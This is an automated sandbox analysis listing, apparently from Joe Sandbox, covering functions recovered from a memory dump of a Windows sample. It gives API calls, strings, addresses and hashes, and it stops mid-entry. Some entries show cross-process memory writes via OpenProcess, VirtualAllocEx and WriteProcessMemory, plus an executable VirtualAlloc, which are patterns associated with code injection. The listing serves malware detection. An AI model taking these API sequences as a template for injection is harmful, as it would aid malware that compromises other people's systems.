__swprintf.LIBCMT ref: 0058E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0058E431

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: bc097267f4da1ce5305438cce08f8d096cc2ce1ff8831cc64e15633d92de31f9
Instruction ID: f3d31cd536064e439c52441c8e2cc5310d51126971226841e556338251b4536e
Opcode Fuzzy Hash: bc097267f4da1ce5305438cce08f8d096cc2ce1ff8831cc64e15633d92de31f9
Instruction Fuzzy Hash: 19917E715046129FCB14FF64C89AD6EBBB8FFD5340F40491DF886972A1EA20ED84CB96

Function 005A523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005A52CD

Part of subcall function 005B0320: __87except.LIBCMT ref: 005B035B

Strings

pow, xrefs: 005A52A5, 005A52C2

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 12e1471e8ee909c7fd4adfcb4483cdc3c5138149e8ba5a3af973b72bb4b0060a
Instruction ID: d717156ee9972536444e2c995c44433409103683f54f35c9ba6d98bc24b0433f
Opcode Fuzzy Hash: 12e1471e8ee909c7fd4adfcb4483cdc3c5138149e8ba5a3af973b72bb4b0060a
Instruction Fuzzy Hash: 3E516A65A0960297CF11BB14C945BFF3F90BF82750F34AD69E4C2862E5FE749CC49A82

Function 005A0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 005A0699
+, xrefs: 005A0690

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: a28d330a31914886a29cfbad7649a79b8483af55064e6bec2bb97ffbf83d9b30
Instruction ID: df14b743a77a81372465cfbe37dcca4992d51864404e43153d792e694eef470a
Opcode Fuzzy Hash: a28d330a31914886a29cfbad7649a79b8483af55064e6bec2bb97ffbf83d9b30
Instruction Fuzzy Hash: 0951CE759042569FDF259F68C884AFA7FA4FF5A310F144057E892AB390D734AC82DB60

Function 0058E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0058E937
_memmove.LIBCMT ref: 0058E9D0
_free.LIBCMT ref: 0058E9F6
_memmove.LIBCMT ref: 0058EAA9

Strings

#VY, xrefs: 0058E9E2

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove$_free
String ID: #VY
API String ID: 2620147621-991703593
Opcode ID: ca1038c05c2d7d90013dfb0d5eccb554b07fbdef14b3176bd68bc9922b49ce8f
Instruction ID: 3f81d3a2525a638d6ba96b5fe281f66a6035182c17bfdbdc74045933779fa5a7
Opcode Fuzzy Hash: ca1038c05c2d7d90013dfb0d5eccb554b07fbdef14b3176bd68bc9922b49ce8f
Instruction Fuzzy Hash: EE5157716087428FDB28DF28C896B2FBBF1BF85714F04492DE98997261E731E841CB52

Function 005DA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005D9E4E,?,?,00000034,00000800,?,00000034), ref: 005E1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005DA3F7

Part of subcall function 005E1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005D9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 005E1CB0

Part of subcall function 005E1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 005E1C08
Part of subcall function 005E1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005D9E12,00000034,?,?,00001004,00000000,00000000), ref: 005E1C18
Part of subcall function 005E1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005D9E12,00000034,?,?,00001004,00000000,00000000), ref: 005E1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005DA464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005DA4B1

Strings

@, xrefs: 005DA4C9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a3839a7f7dff7b99b8711144d4a4dbf3d4ef4ebda103081646b1ab969c1526dd
Instruction ID: 6ed9429a001703fababf3eb2fbc07dcf6b1fc3961734c8439c423c47d7907152
Opcode Fuzzy Hash: a3839a7f7dff7b99b8711144d4a4dbf3d4ef4ebda103081646b1ab969c1526dd
Instruction Fuzzy Hash: D0413D7290021DAFDF24DBA4CD85EDEBBB8FB45300F104096FA55B7281DA706E85CBA1

Function 006079FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00607A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00607A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00607ABE

Strings

SysMonthCal32, xrefs: 00607A51

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3d91acf3c2931190bb5eb030c1fada335e7f95aa0d1cfbcdaf386feb6c16041f
Instruction ID: c161a3b6dc587cd269c05a382147a59ee4b63378e6b65b58699b17ad430be55a
Opcode Fuzzy Hash: 3d91acf3c2931190bb5eb030c1fada335e7f95aa0d1cfbcdaf386feb6c16041f
Instruction Fuzzy Hash: D921AD32640219ABDF158E54CC86FEF3BAAEB48724F114214FE156B2D0DAB1B8518BA0

Function 006081B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0060826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0060827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00608284

Strings

msctls_updown32, xrefs: 006081E9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 930ba16a83f56f71aa1bf4d9df652eddd5fdc571fedac42824f3c6d90c842538
Instruction ID: 8be5024b4d1d00bc388f84e0ed2293363546f073326c894e0037704c10fe623f
Opcode Fuzzy Hash: 930ba16a83f56f71aa1bf4d9df652eddd5fdc571fedac42824f3c6d90c842538
Instruction Fuzzy Hash: BF218EB5604209AFEB14DF54DC85DA73BEEEF5A364B080459FA019B391CBB0EC11CBA0

Function 006072D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00607360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00607370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00607395

Strings

Listbox, xrefs: 0060732D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: cb32c5f3c1d766f77c1f216856e397567fea0e78be21a819e3c4eb78bf7154b8
Instruction ID: 0984e6fcde3a40479608ce3b142e9d4eef1ee40bb218c9903e421c9bb3bf6f1d
Opcode Fuzzy Hash: cb32c5f3c1d766f77c1f216856e397567fea0e78be21a819e3c4eb78bf7154b8
Instruction Fuzzy Hash: C421A132644118ABEF198F54CC45EEB37ABEB89754F118125F900972D0C671AC519BA0

Function 00607D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00607D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00607DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00607DB9

Strings

msctls_trackbar32, xrefs: 00607D6E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3ea812e6be4022851929bd83af126d88069a0bd8d6760de62a47729b9b38c7f6
Instruction ID: cc88784ae8993865c75ef5af3e1d618e5b77aeabda10b79cd0e739ff087faa52
Opcode Fuzzy Hash: 3ea812e6be4022851929bd83af126d88069a0bd8d6760de62a47729b9b38c7f6
Instruction Fuzzy Hash: 87113A72644209BFDF145F60CC05FE73BAAEF89714F114519FA40A61D0C271E811DB20

Function 005FC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005C027A,?), ref: 005FC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005FC6F9

Strings

kernel32.dll, xrefs: 005FC6E2
GetSystemWow64DirectoryW, xrefs: 005FC6F3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: c1e5d29d13dc5d3f5c91dac5400eb8c13a41deac7318315d11363b4115950e7c
Instruction ID: 4bf1978e7b431d0b988d3edd9d9645e25777996d6f31b56670f7faf89d0fd182
Opcode Fuzzy Hash: c1e5d29d13dc5d3f5c91dac5400eb8c13a41deac7318315d11363b4115950e7c
Instruction Fuzzy Hash: FBE08C3814171A9FEB206B25C94AAAA7ED5FB04304B54A42EE985C3220D7B8D8808B10

Function 00594B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00594B44,?,005949D4,?,?,005927AF,?,00000001), ref: 00594B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594B97

Strings

kernel32.dll, xrefs: 00594B80
Wow64DisableWow64FsRedirection, xrefs: 00594B91

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 06c3a8a9482d0b742b1e724d2d84a287c23833cc8f1f3a5ab5d16e581cc8c19a
Instruction ID: e2117753a9eee99bd8961455013c443644d7c44899ef6295fc211495521a6722
Opcode Fuzzy Hash: 06c3a8a9482d0b742b1e724d2d84a287c23833cc8f1f3a5ab5d16e581cc8c19a
Instruction Fuzzy Hash: 1AD01770510716DFEF209F71DC19B867AE6BF04355F1AD82EE48AE2560E6B4E8C0CA54

Function 00594BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00594AF7,?), ref: 00594BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594BCA

Strings

kernel32.dll, xrefs: 00594BB3
Wow64RevertWow64FsRedirection, xrefs: 00594BC4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 928147c24b78e3689a952bf7297bbc3a469f1a37687289d4d0d867d2c3835528
Instruction ID: bb73821430a9f7a5643794ef2b1c834077bf4a963b3ead6ba910fdb1d5ee0086
Opcode Fuzzy Hash: 928147c24b78e3689a952bf7297bbc3a469f1a37687289d4d0d867d2c3835528
Instruction Fuzzy Hash: 81D0E2B05107169FEF209B71D809A867AE6AF04351B1AEC6AA486D2564EAB8D8C0CA50

Function 00601447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00601696), ref: 00601455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00601467

Strings

advapi32.dll, xrefs: 00601450
RegDeleteKeyExW, xrefs: 00601461

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: b0f4963c44abcff3329b4de844802a883a80ade607218101f55ca3f2647d4c9d
Instruction ID: 0913c19268a0e26a9c71639339f86a9fe0dd1f00ffc91e72355f976e0ec227d1
Opcode Fuzzy Hash: b0f4963c44abcff3329b4de844802a883a80ade607218101f55ca3f2647d4c9d
Instruction Fuzzy Hash: 3BD01231550712DFE7205F75C80968776D6AF06395F15C82BF4D5E62A0D6B4D4C0C750

Function 005955F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00595E3D), ref: 005955FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00595610

Strings

kernel32.dll, xrefs: 005955F9
GetNativeSystemInfo, xrefs: 0059560A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 7eac886540047dccd1fe5c41f5e58046f5a32ff46d810cc4d92352f04ea33e75
Instruction ID: ff4250c896f46d2ccb37cb43bfa95c41a36959b1fafeebf2a9684fe84b85f373
Opcode Fuzzy Hash: 7eac886540047dccd1fe5c41f5e58046f5a32ff46d810cc4d92352f04ea33e75
Instruction Fuzzy Hash: 8ED0C734820B12DFFF208F70C9092867AE6AF01351B1AEC2AE482C21A0E6B4C8C0CB40

Function 005F97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,005F93DE,?,00610980), ref: 005F97D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005F97EA

Strings

kernel32.dll, xrefs: 005F97D3
GetModuleHandleExW, xrefs: 005F97E4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 59c3ef432c57ac5ca4257e3188524be40d7aa06e007f22b6daed3ba5fddef465
Instruction ID: aaebdb8933f5a9809a9dc91b1eed5fdef1c2e6287c878e10a8b3f098ef95e13e
Opcode Fuzzy Hash: 59c3ef432c57ac5ca4257e3188524be40d7aa06e007f22b6daed3ba5fddef465
Instruction Fuzzy Hash: 6AD0C230410717DFEB205F70D88925676D5FF05381F15EC2AD481D6150DBB8C4C0C640

Function 005FE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 005FE7A7
CharLowerBuffW.USER32(?,?), ref: 005FE7EA

Part of subcall function 005FDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 005FDEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 005FE9EA
_memmove.LIBCMT ref: 005FE9FD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8745000e38e7f8f1a35c570b88198ca84027aab56197fc8adadf831266e13cc7
Instruction ID: df6f920c7599f0e979ffe515f968741036be1756bbf5fcd1fd85b2482bca26ea
Opcode Fuzzy Hash: 8745000e38e7f8f1a35c570b88198ca84027aab56197fc8adadf831266e13cc7
Instruction Fuzzy Hash: 50C18871A083068FC714DF28C48596ABBE4FF89314F04892EF9999B361D735E945CF82

Function 005F877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005F87AD
CoUninitialize.OLE32 ref: 005F87B8

Part of subcall function 0060DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,005F8A0E,?,00000000), ref: 0060DF71

VariantInit.OLEAUT32(?), ref: 005F87C3
VariantClear.OLEAUT32(?), ref: 005F8A94

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: e7b0839b36b9470d96208400c9df56452ce0a005af80360178f0bbc1dd41f7f2
Instruction ID: 127074fdc648cd59d96480dc507892c48eef73c3b4ade02e50e9f5c58de08f20
Opcode Fuzzy Hash: e7b0839b36b9470d96208400c9df56452ce0a005af80360178f0bbc1dd41f7f2
Instruction Fuzzy Hash: D5A16935204B069FD700EF54C485B2ABBE5FF88364F048849FA85AB3A1DB74ED40CB92

Function 005D814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00613C4C,?), ref: 005D8308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00613C4C,?), ref: 005D8320
CLSIDFromProgID.OLE32(?,?,00000000,00610988,000000FF,?,00000000,00000800,00000000,?,00613C4C,?), ref: 005D8345
_memcmp.LIBCMT ref: 005D8366

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
